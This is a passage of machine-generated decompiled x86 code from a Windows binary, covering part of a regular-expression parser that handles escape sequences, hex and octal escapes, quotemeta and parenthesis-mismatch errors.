                                                    														if(__cl != 0x6e) {
                                                    															L86:
                                                    															__eflags = __cl - 0x72;
                                                    															if(__cl != 0x72) {
                                                    																L89:
                                                    																__eflags = __cl - 0x74;
                                                    																if(__cl != 0x74) {
                                                    																	L92:
                                                    																	__eflags = __cl - 0x5c;
                                                    																	if(__cl != 0x5c) {
                                                    																		L96:
                                                    																		_push(__edi);
                                                    																		_push(__ecx);
                                                    																		__eax = E00409CBB();
                                                    																		_pop(__ecx);
                                                    																		__eflags = __eax;
                                                    																		_pop(__ecx);
                                                    																		if(__eax == 0) {
                                                    																			__eax =  *__edi;
                                                    																			__ecx =  &(__esi[4]);
                                                    																			__eax =  *__ebx;
                                                    																			__al =  *( *__ebx);
                                                    																			__eax = E00409BC5(__esi,  *__ebx,  *__edi,  &(__esi[4]));
                                                    																			 *(__ebp - 0x10) = __eax;
                                                    																			__eflags = __eax;
                                                    																			__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    																			__eax = __ebp - 0x14;
                                                    																			 *(__ebp - 0x14) = __cl;
                                                    																			__ecx = __ebp - 0x24;
                                                    																			__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    																			__ecx = __ebp - 0x14;
                                                    																		} else {
                                                    																			__ecx =  *__edi;
                                                    																			__edx =  &(__esi[4]);
                                                    																			__eax = E00409B0F(__eax,  *__edi,  &(__esi[4]));
                                                    																			 *(__ebp - 0x10) = __eax;
                                                    																			__eflags = __eax;
                                                    																			__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    																			__eax = __ebp - 0x14;
                                                    																			 *(__ebp - 0x14) = __cl;
                                                    																			__ecx = __ebp - 0x24;
                                                    																			__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    																			__ecx = __ebp - 0x14;
                                                    																		}
                                                    																		L44:
                                                    																		__eax = E00406ED3(__ecx);
                                                    																		 *__ebx =  *__ebx + 1;
                                                    																		goto L18;
                                                    																	}
                                                    																	__eflags =  *(__ebp + 0x13);
                                                    																	if( *(__ebp + 0x13) == 0) {
                                                    																		goto L96;
                                                    																	}
                                                    																	__eax = __eax + 1;
                                                    																	__ecx =  &(__esi[4]);
                                                    																	 *__ebx = __eax;
                                                    																	__eax =  *__edi;
                                                    																	__eax = E00409BC5(__esi, 0x5c,  *__edi,  &(__esi[4]));
                                                    																	 *(__ebp - 0x10) = __eax;
                                                    																	__eflags = __eax;
                                                    																	_t420 = __eax != 0;
                                                    																	__eflags = _t420;
                                                    																	__ecx = __ecx & 0xffffff00 | _t420;
                                                    																	__eax = __ebp - 0x14;
                                                    																	 *(__ebp - 0x14) = __cl;
                                                    																	__ecx = __ebp - 0x24;
                                                    																	__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    																	__ecx = __ebp - 0x14;
                                                    																	goto L95;
                                                    																}
                                                    																__eflags =  *(__ebp + 0x13);
                                                    																if( *(__ebp + 0x13) == 0) {
                                                    																	goto L92;
                                                    																}
                                                    																__eax = __eax + 1;
                                                    																__ecx =  &(__esi[4]);
                                                    																 *__ebx = __eax;
                                                    																__eax =  *__edi;
                                                    																__eax = E00409BC5(__esi, 9,  *__edi,  &(__esi[4]));
                                                    																 *(__ebp - 0x10) = __eax;
                                                    																__eflags = __eax;
                                                    																__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    																__eax = __ebp - 0x14;
                                                    																 *(__ebp - 0x14) = __cl;
                                                    																__ecx = __ebp - 0x24;
                                                    																__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    																__ecx = __ebp - 0x14;
                                                    																goto L95;
                                                    															}
                                                    															__eflags =  *(__ebp + 0x13);
                                                    															if( *(__ebp + 0x13) == 0) {
                                                    																goto L89;
                                                    															}
                                                    															__eax = __eax + 1;
                                                    															__ecx =  &(__esi[4]);
                                                    															 *__ebx = __eax;
                                                    															__eax =  *__edi;
                                                    															__eax = E00409BC5(__esi, 0xd,  *__edi,  &(__esi[4]));
                                                    															 *(__ebp - 0x10) = __eax;
                                                    															__eflags = __eax;
                                                    															__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    															__eax = __ebp - 0x14;
                                                    															 *(__ebp - 0x14) = __cl;
                                                    															__ecx = __ebp - 0x24;
                                                    															__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    															__ecx = __ebp - 0x14;
                                                    															goto L95;
                                                    														}
                                                    														__eflags =  *(__ebp + 0x13);
                                                    														if( *(__ebp + 0x13) == 0) {
                                                    															goto L86;
                                                    														}
                                                    														__eax = __eax + 1;
                                                    														__ecx =  &(__esi[4]);
                                                    														 *__ebx = __eax;
                                                    														__eax =  *__edi;
                                                    														__eax = E00409BC5(__esi, 0xa,  *__edi,  &(__esi[4]));
                                                    														 *(__ebp - 0x10) = __eax;
                                                    														__eflags = __eax;
                                                    														__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    														__eax = __ebp - 0x14;
                                                    														 *(__ebp - 0x14) = __cl;
                                                    														__ecx = __ebp - 0x24;
                                                    														__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    														__ecx = __ebp - 0x14;
                                                    														goto L95;
                                                    													}
                                                    													__eflags =  *(__ebp + 0x13);
                                                    													if( *(__ebp + 0x13) == 0) {
                                                    														goto L83;
                                                    													}
                                                    													__eax = __eax + 1;
                                                    													__ecx =  &(__esi[4]);
                                                    													 *__ebx = __eax;
                                                    													__eax =  *__edi;
                                                    													__eax = E00409BC5(__esi, 0xc,  *__edi,  &(__esi[4]));
                                                    													 *(__ebp - 0x10) = __eax;
                                                    													__eflags = __eax;
                                                    													__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    													__eax = __ebp - 0x14;
                                                    													 *(__ebp - 0x14) = __cl;
                                                    													__ecx = __ebp - 0x24;
                                                    													__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    													__ecx = __ebp - 0x14;
                                                    													goto L95;
                                                    												}
                                                    												__eflags =  *(__ebp + 0x13);
                                                    												if( *(__ebp + 0x13) == 0) {
                                                    													goto L80;
                                                    												}
                                                    												__eax = __eax + 1;
                                                    												__ecx =  &(__esi[4]);
                                                    												 *__ebx = __eax;
                                                    												__eax =  *__edi;
                                                    												__eax = E00409BC5(__esi, 7,  *__edi,  &(__esi[4]));
                                                    												 *(__ebp - 0x10) = __eax;
                                                    												__eflags = __eax;
                                                    												__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    												__eax = __ebp - 0x14;
                                                    												 *(__ebp - 0x14) = __cl;
                                                    												__ecx = __ebp - 0x24;
                                                    												__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    												__ecx = __ebp - 0x14;
                                                    												goto L95;
                                                    											}
                                                    											__ecx = __esi[0x27];
                                                    											 *(__ebp + 0x10) = __esi[0x27];
                                                    											__eax =  *0x41720c();
                                                    											__eax =  *(__ebp + 0x10);
                                                    											__ecx =  *(__eax + 4);
                                                    											 *__ebx =  *__ebx + 1;
                                                    											__eax =  *(__eax + 8);
                                                    											__edx = __ecx;
                                                    											__eax = __eax + __ecx;
                                                    											__ecx =  *__ebx;
                                                    											__edx =  ~__edx;
                                                    											asm("sbb edx, edx");
                                                    											__edx = __edx & __eax;
                                                    											__eflags = __edx - __ecx;
                                                    											if(__edx == __ecx) {
                                                    												__al =  *((intOrPtr*)(__ebp + 0xf));
                                                    												_push(0);
                                                    												__ecx = __ebp - 0x54;
                                                    												 *(__ebp - 0x54) =  *((intOrPtr*)(__ebp + 0xf));
                                                    												__eax =  *0x417230();
                                                    												__esi = "incomplete escape sequence \\c";
                                                    												__eax = strlen(__esi);
                                                    												_pop(__ecx);
                                                    												_push(__eax);
                                                    												_push(__esi);
                                                    												__ecx = __ebp - 0x54;
                                                    												 *0x417234() = __ebp - 0x54;
                                                    												__ecx = __ebp - 0xb8;
                                                    												 *((char*)(__ebp - 4)) = 6;
                                                    												E00404FA7(__ecx, __ebp - 0x54) = __ebp - 0xb8;
                                                    												_push(0x4196f8);
                                                    												_push(__ebp - 0xb8);
                                                    												 *(__ebp - 0xb8) = 0x417698;
                                                    												L004153FE();
                                                    											}
                                                    											__al =  *__ecx;
                                                    											__ecx = __ecx + 1;
                                                    											__eflags = __al - 0x61;
                                                    											 *__ebx = __ecx;
                                                    											if(__al >= 0x61) {
                                                    												__eflags = __al - 0x7a;
                                                    												if(__al <= 0x7a) {
                                                    													__eax = __al;
                                                    													_push(__al);
                                                    													__eax =  *0x4172a4();
                                                    													_pop(__ecx);
                                                    												}
                                                    											}
                                                    											__ecx =  *__edi;
                                                    											__edx =  &(__esi[4]);
                                                    											__al = __al ^ 0x00000040;
                                                    											__eax = E00409BC5(__esi, __eax,  *__edi,  &(__esi[4]));
                                                    											 *(__ebp - 0x10) = __eax;
                                                    											__eflags = __eax;
                                                    											__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    											__eax = __ebp - 0x14;
                                                    											 *(__ebp - 0x14) = __cl;
                                                    											__ecx = __ebp - 0x24;
                                                    											__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    											__ecx = __ebp - 0x14;
                                                    											goto L95;
                                                    										}
                                                    										 *(__ebp + 8) =  *(__ebp + 8) & 0x00000000;
                                                    										 *(__ebp + 0x13) =  *(__ebp + 0x13) & 0x00000000;
                                                    										__eax = __eax + 1;
                                                    										__eflags = __eax;
                                                    										 *__ebx = __eax;
                                                    										while(1) {
                                                    											__ecx = __esi[0x27];
                                                    											 *(__ebp + 0x14) = __esi[0x27];
                                                    											__eax =  *0x41720c();
                                                    											__eax =  *(__ebp + 0x14);
                                                    											__ecx =  *(__eax + 4);
                                                    											__eax =  *(__eax + 8);
                                                    											__edx = __ecx;
                                                    											__eax = __eax + __ecx;
                                                    											__edx =  ~__ecx;
                                                    											asm("sbb edx, edx");
                                                    											__edx =  ~__ecx & __eax;
                                                    											__eax =  *__ebx;
                                                    											__eflags = __edx - __eax;
                                                    											if(__edx == __eax) {
                                                    												break;
                                                    											}
                                                    											__al =  *__eax;
                                                    											__eflags = __al - 0x30;
                                                    											if(__al < 0x30) {
                                                    												L64:
                                                    												__eflags = __al - 0x61;
                                                    												if(__al < 0x61) {
                                                    													L66:
                                                    													__eflags = __al - 0x41;
                                                    													if(__al < 0x41) {
                                                    														break;
                                                    													}
                                                    													__eflags = __al - 0x46;
                                                    													if(__al > 0x46) {
                                                    														break;
                                                    													}
                                                    													L68:
                                                    													__eax = E00402FBD(__eax);
                                                    													__cl =  *(__ebp + 8);
                                                    													__cl =  *(__ebp + 8) << 4;
                                                    													__al = __al + __cl;
                                                    													 *(__ebp + 0x13) =  *(__ebp + 0x13) + 1;
                                                    													 *__ebx =  *__ebx + 1;
                                                    													__eflags =  *(__ebp + 0x13) - 2;
                                                    													 *(__ebp + 8) = __al;
                                                    													if( *(__ebp + 0x13) < 2) {
                                                    														continue;
                                                    													}
                                                    													break;
                                                    												}
                                                    												__eflags = __al - 0x66;
                                                    												if(__al <= 0x66) {
                                                    													goto L68;
                                                    												}
                                                    												goto L66;
                                                    											}
                                                    											__eflags = __al - 0x39;
                                                    											if(__al <= 0x39) {
                                                    												goto L68;
                                                    											}
                                                    											goto L64;
                                                    										}
                                                    										__eax =  *__edi;
                                                    										__ecx =  &(__esi[4]);
                                                    										__eax = E00409BC5(__esi,  *(__ebp + 8),  *__edi,  &(__esi[4]));
                                                    										 *(__ebp - 0x10) = __eax;
                                                    										__eflags = __eax;
                                                    										__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    										__eax = __ebp - 0x14;
                                                    										 *(__ebp - 0x14) = __cl;
                                                    										__ecx = __ebp - 0x24;
                                                    										__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    										__ecx = __ebp - 0x14;
                                                    										goto L95;
                                                    									}
                                                    									__eax = __eax + 1;
                                                    									__ecx =  &(__esi[4]);
                                                    									 *__ebx = __eax;
                                                    									__eax =  *__edi;
                                                    									__eax = E00409BC5(__esi, 0x1b,  *__edi,  &(__esi[4]));
                                                    									 *(__ebp - 0x10) = __eax;
                                                    									__eflags = __eax;
                                                    									__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    									__eax = __ebp - 0x14;
                                                    									 *(__ebp - 0x14) = __cl;
                                                    									__ecx = __ebp - 0x24;
                                                    									__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    									__ecx = __ebp - 0x14;
                                                    									goto L95;
                                                    								}
                                                    								__eflags = __cl - 0x39;
                                                    								if(__cl > 0x39) {
                                                    									goto L57;
                                                    								}
                                                    								__ecx = __esi[0x27];
                                                    								 *(__ebp - 0x28) = __eax;
                                                    								 *(__ebp + 0x10) = __esi[0x27];
                                                    								__eax =  *0x41720c();
                                                    								__eax =  *(__ebp + 0x10);
                                                    								__ecx =  *(__eax + 4);
                                                    								__eax =  *(__eax + 8);
                                                    								__edx = __ecx;
                                                    								__eax = __eax + __ecx;
                                                    								__edx =  ~__ecx;
                                                    								asm("sbb edx, edx");
                                                    								__edx =  ~__ecx & __eax;
                                                    								__eax = __ebp - 0x28;
                                                    								__eax = E004090FF(__ebp - 0x28, __edx, 0x3e7);
                                                    								__ecx =  *__ebx;
                                                    								__eflags =  *( *__ebx) - 0x30;
                                                    								if( *( *__ebx) == 0x30) {
                                                    									L51:
                                                    									 *(__ebp + 8) =  *(__ebp + 8) & 0x00000000;
                                                    									_t297 = __ebp + 0x13;
                                                    									 *_t297 =  *(__ebp + 0x13) & 0x00000000;
                                                    									__eflags =  *_t297;
                                                    									while(1) {
                                                    										__ecx = __esi[0x27];
                                                    										 *(__ebp + 0x14) = __esi[0x27];
                                                    										__eax =  *0x41720c();
                                                    										__eax =  *(__ebp + 0x14);
                                                    										__ecx =  *(__eax + 4);
                                                    										__eax =  *(__eax + 8);
                                                    										__edx = __ecx;
                                                    										__eax = __eax + __ecx;
                                                    										__edx =  ~__ecx;
                                                    										asm("sbb edx, edx");
                                                    										__edx =  ~__ecx & __eax;
                                                    										__eax =  *__ebx;
                                                    										__eflags = __edx - __eax;
                                                    										if(__edx == __eax) {
                                                    											break;
                                                    										}
                                                    										__cl =  *__eax;
                                                    										__eflags = __cl - 0x30;
                                                    										if(__cl < 0x30) {
                                                    											break;
                                                    										}
                                                    										__eflags = __cl - 0x37;
                                                    										if(__cl > 0x37) {
                                                    											break;
                                                    										}
                                                    										 *(__ebp + 0x13) =  *(__ebp + 0x13) + 1;
                                                    										__eax = __eax + 1;
                                                    										__eflags =  *(__ebp + 0x13) - 3;
                                                    										 *(__ebp + 8) = ( *(__ebp + 8) - 6 << 3) + __cl;
                                                    										 *__ebx = __eax;
                                                    										if( *(__ebp + 0x13) < 3) {
                                                    											continue;
                                                    										}
                                                    										break;
                                                    									}
                                                    									__eax =  *__edi;
                                                    									__ecx =  &(__esi[4]);
                                                    									__eax = E00409BC5(__esi,  *(__ebp + 8),  *__edi,  &(__esi[4]));
                                                    									 *(__ebp - 0x10) = __eax;
                                                    									__eflags = __eax;
                                                    									__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    									__eax = __ebp - 0x14;
                                                    									 *(__ebp - 0x14) = __cl;
                                                    									__ecx = __ebp - 0x24;
                                                    									__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    									__ecx = __ebp - 0x14;
                                                    									goto L95;
                                                    								}
                                                    								__eflags = __eax - 0xa;
                                                    								if(__eax < 0xa) {
                                                    									L50:
                                                    									__ecx =  *__edi;
                                                    									__edx =  &(__esi[4]);
                                                    									__eax = E00409C62(__eax,  *__edi,  &(__esi[4]));
                                                    									 *(__ebp - 0x10) = __eax;
                                                    									__eflags = __eax;
                                                    									__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    									__eax = __ebp - 0x14;
                                                    									 *(__ebp - 0x14) = __cl;
                                                    									__ecx = __ebp - 0x24;
                                                    									__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    									__ecx = __ebp - 0x14;
                                                    									E00406ED3(__ecx) =  *(__ebp - 0x28);
                                                    									 *__ebx =  *(__ebp - 0x28);
                                                    									goto L18;
                                                    								}
                                                    								__eflags = __eax - __esi[0xb];
                                                    								if(__eax >= __esi[0xb]) {
                                                    									goto L51;
                                                    								}
                                                    								goto L50;
                                                    							}
                                                    							__ecx =  *__edi;
                                                    							__eax = __eax - 1;
                                                    							__edx =  &(__esi[4]);
                                                    							 *__ebx = __eax;
                                                    							__al =  *__eax;
                                                    							__eax = E00409BC5(__esi, __eax,  *__edi,  &(__esi[4]));
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							__eflags = __eax;
                                                    							_t273 = __eax != 0;
                                                    							__eflags = _t273;
                                                    							__ecx = __ecx & 0xffffff00 | _t273;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L44;
                                                    						case 9:
                                                    							goto L18;
                                                    						case 0xa:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							__eax = E0040811C();
                                                    							__eax = E00409B0F(__eax,  *__edi,  &(__esi[4]));
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L95;
                                                    						case 0xb:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							__eax = E004081D0();
                                                    							__eax = E00409B0F(__eax,  *__edi,  &(__esi[4]));
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L95;
                                                    						case 0xc:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							__eax = E00408154();
                                                    							__eax = E00409B0F(__eax,  *__edi,  &(__esi[4]));
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L95;
                                                    						case 0xd:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							__eax = E00408208();
                                                    							__eax = E00409B0F(__eax,  *__edi,  &(__esi[4]));
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L95;
                                                    						case 0xe:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							__eax = E004080D8();
                                                    							__eax = E00409B0F(__eax,  *__edi,  &(__esi[4]));
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L95;
                                                    						case 0xf:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							__eax = E0040818C();
                                                    							__eax = E00409B0F(__eax,  *__edi,  &(__esi[4]));
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L95;
                                                    						case 0x10:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							_push( &(__esi[4]));
                                                    							__eax = E00409B68(__eflags,  *__edi);
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L95;
                                                    						case 0x11:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							_push( &(__esi[4]));
                                                    							__eax = E00409B87(__eflags,  *__edi);
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L95;
                                                    						case 0x12:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							_push( &(__esi[4]));
                                                    							__eax = E00409BA6(__eflags,  *__edi);
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L95;
                                                    						case 0x13:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							_push( &(__esi[4]));
                                                    							_push( *__edi);
                                                    							_push(1);
                                                    							__eax = E00409A43();
                                                    							__esp = __esp + 0xc;
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L95;
                                                    						case 0x14:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							_push( &(__esi[4]));
                                                    							_push( *__edi);
                                                    							_push(0);
                                                    							__eax = E00409A43();
                                                    							__esp = __esp + 0xc;
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L95;
                                                    						case 0x15:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							_push(__ecx);
                                                    							_push( *__edi);
                                                    							__eax = E00409A9D(__ecx, __eflags);
                                                    							_pop(__ecx);
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							_pop(__ecx);
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L95;
                                                    						case 0x16:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							_push(__ecx);
                                                    							_push( *__edi);
                                                    							__eax = E00409AD6(__ecx, __eflags);
                                                    							_pop(__ecx);
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							_pop(__ecx);
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							L95:
                                                    							__eax = E00406ED3(__ecx);
                                                    							goto L18;
                                                    						case 0x17:
                                                    							__eax =  *__ebx;
                                                    							 *(__ebp - 0x28) = __eax;
                                                    							 *(__ebp + 0x10) = __eax;
                                                    							while(1) {
                                                    								__ecx = __esi[0x27];
                                                    								 *(__ebp + 8) = __esi[0x27];
                                                    								__eax =  *0x41720c();
                                                    								__eax =  *(__ebp + 8);
                                                    								__ecx =  *(__eax + 4);
                                                    								__eax =  *(__eax + 8);
                                                    								__edx = __ecx;
                                                    								__eax = __eax + __ecx;
                                                    								__edx =  ~__ecx;
                                                    								asm("sbb edx, edx");
                                                    								__edx =  ~__ecx & __eax;
                                                    								__eflags = ( ~__ecx & __eax) -  *__ebx;
                                                    								if(( ~__ecx & __eax) ==  *__ebx) {
                                                    									break;
                                                    								}
                                                    								__ecx = __esi[0x27];
                                                    								 *(__ebp + 8) = __esi[0x27];
                                                    								__eax =  *0x41720c();
                                                    								__eax =  *(__ebp + 8);
                                                    								__ecx =  *(__eax + 4);
                                                    								__eax =  *(__eax + 8);
                                                    								__edx = __ecx;
                                                    								__eax = __eax + __ecx;
                                                    								__edx =  ~__ecx;
                                                    								asm("sbb edx, edx");
                                                    								__ecx = __edi;
                                                    								__eax = E00406B23(__ecx, __ebx, __edx);
                                                    								__eflags = __eax;
                                                    								if(__eax == 0) {
                                                    									__ecx = __esi[0x27];
                                                    									 *(__ebp + 8) = __esi[0x27];
                                                    									__eax =  *0x41720c();
                                                    									__eax =  *(__ebp + 8);
                                                    									__ecx =  *(__eax + 4);
                                                    									__eax =  *(__eax + 8);
                                                    									__edx = __ecx;
                                                    									__eax = __eax + __ecx;
                                                    									__edx =  ~__ecx;
                                                    									asm("sbb edx, edx");
                                                    									__edx =  ~__ecx & __eax;
                                                    									__eax =  *__ebx;
                                                    									__eflags = __edx - __eax;
                                                    									if(__edx != __eax) {
                                                    										__eax = __eax + 1;
                                                    										__eflags = __eax;
                                                    										 *__ebx = __eax;
                                                    									}
                                                    									L106:
                                                    									__eax =  *__ebx;
                                                    									 *(__ebp - 0x28) =  *__ebx;
                                                    									continue;
                                                    								}
                                                    								__eflags = __eax - 0x21;
                                                    								if(__eax == 0x21) {
                                                    									break;
                                                    								}
                                                    								goto L106;
                                                    							}
                                                    							__eax =  *(__ebp - 0x28);
                                                    							__eflags = __eax -  *(__ebp + 0x10);
                                                    							if(__eax !=  *(__ebp + 0x10)) {
                                                    								__edi =  *__edi;
                                                    								_push(__esi);
                                                    								_push(__edi);
                                                    								_push(__eax);
                                                    								_push( *(__ebp + 0x10));
                                                    								__eax = E0040A5B8();
                                                    								__ecx =  *(__ebp + 0xc);
                                                    								__esp = __esp + 0x10;
                                                    								__edx =  *(__ecx + 0x1c);
                                                    								 *( *(__ecx + 0x1c)) = __eax;
                                                    								 *(__ecx + 0x1c) = __eax;
                                                    							}
                                                    							goto L20;
                                                    						case 0x18:
                                                    							__al =  *((intOrPtr*)(__ebp + 0xf));
                                                    							_push(0);
                                                    							__ecx = __ebp - 0x74;
                                                    							 *(__ebp - 0x74) =  *((intOrPtr*)(__ebp + 0xf));
                                                    							__eax =  *0x417230();
                                                    							__esi = "quotemeta turned off, but was never turned on";
                                                    							_push(__esi);
                                                    							L004153D6();
                                                    							_pop(__ecx);
                                                    							_push(__eax);
                                                    							_push(__esi);
                                                    							__ecx = __ebp - 0x74;
                                                    							 *0x417234() = __ebp - 0x74;
                                                    							__ecx = __ebp - 0xf0;
                                                    							 *((char*)(__ebp - 4)) = 7;
                                                    							__eax = E00404FA7(__ebp - 0xf0, __ebp - 0x74);
                                                    							 *((intOrPtr*)(__ebp - 0xef7b)) =  *((intOrPtr*)(__ebp - 0xef7b)) - 1;
                                                    							goto [far dword [eax-0x8];
                                                    					}
                                                    				} else {
                                                    					if( *((intOrPtr*)( *((intOrPtr*)(_t568 + 0xc)) + 0x10)) != 0) {
                                                    						 *((char*)(_t568 - 0x1c)) =  *((intOrPtr*)(_t568 + 0xf));
                                                    						 *0x417230(0);
                                                    						_t567 = "mismatched parenthesis";
                                                    						 *0x417234(_t567, strlen(_t567));
                                                    						 *(_t568 - 4) = 2;
                                                    						E00404FA7(_t568 - 0x80, _t568 - 0x1c);
                                                    						_push(0x4196f8);
                                                    						_push(_t568 - 0x80);
                                                    						 *((intOrPtr*)(_t568 - 0x80)) = 0x417698;
                                                    						L004153FE();
                                                    					}
